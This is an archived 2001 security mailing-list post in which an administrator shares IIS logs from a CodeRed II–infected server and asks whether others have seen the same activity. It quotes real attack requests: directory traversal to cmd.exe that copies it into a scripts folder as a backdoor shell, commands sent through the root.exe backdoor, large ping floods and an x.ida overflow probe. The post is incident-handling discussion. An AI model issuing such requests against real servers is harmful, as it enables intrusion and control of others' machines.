I have seen this idea floating around the focus-linux list the last couple of days, and I have now seen this in person. I am not at all in favor of shutting down or crashing remote vulnerable servers. You just really never know how important that machine may be, there may be a very good reason the admins are leaving it running until they can take it out of service safely. However, what follows is a very polite notice, and very attention grabbing. I just started with a new company, and it's the last thing I would have wanted to see, but at least the guy didn't crash the machine, I would have had a far worse day. 2001-08-13 20:19:42 24.xx.xxx.xxx - xx.xx.xx.xxx 80 GET /scripts/root.exe /c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+wor m.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+ You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+ it.++Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+(or+wherever+you r+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location).%22 502 Lynx/2.8.4dev.7+libwww-FM/2.14 From what I understand, this machine was not even known to be running IIS at all. After further investigation I found it to have been previously rooted on 6/19/01: 2001-06-19 12:22:16 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 - 2001-06-19 14:47:50 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+network-prohibited%20-n++-l+65500+-w+0+ 502 - 2001-06-19 14:58:50 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+network-unknown%20-n++-l+65500+-w+0+ 502 - 2001-06-19 17:10:44 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+network-unreachable%20-n++-l+65500+-w+0+ 502 - Does the above look like a script anyone has seen previously? I also had quite a few of these, all from the same IP, on different days: 2001-07-31 14:36:42 192.xx.xx.xxx - xx.xx.xx.xxx 80 GET /iisstart.asp - 200 - 2001-07-31 14:36:44 192.xx.xx.xxx - xx.xx.xx.xxx 80 GET /x.ida AAAAAAAAAAAAAAAAA-snip- I haven't seen anything searching for x.ida before, and this was like once a day, on about 4 different days, I thought that was odd. This machine has been taken out of service and replaced, but that is secondary. Has anyone else seen the same scripted response to an infected CodeRed server? This popped up a dialog box essentially saying "You've been owned, fix it", but not causing any reboots or crashes, and certainly not any measures as extreme as I've seen tossed about recently. Chris Curtiss xrayspxat_private --a unix admin in an NT world-- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Aug 14 2001 - 11:02:39 PDT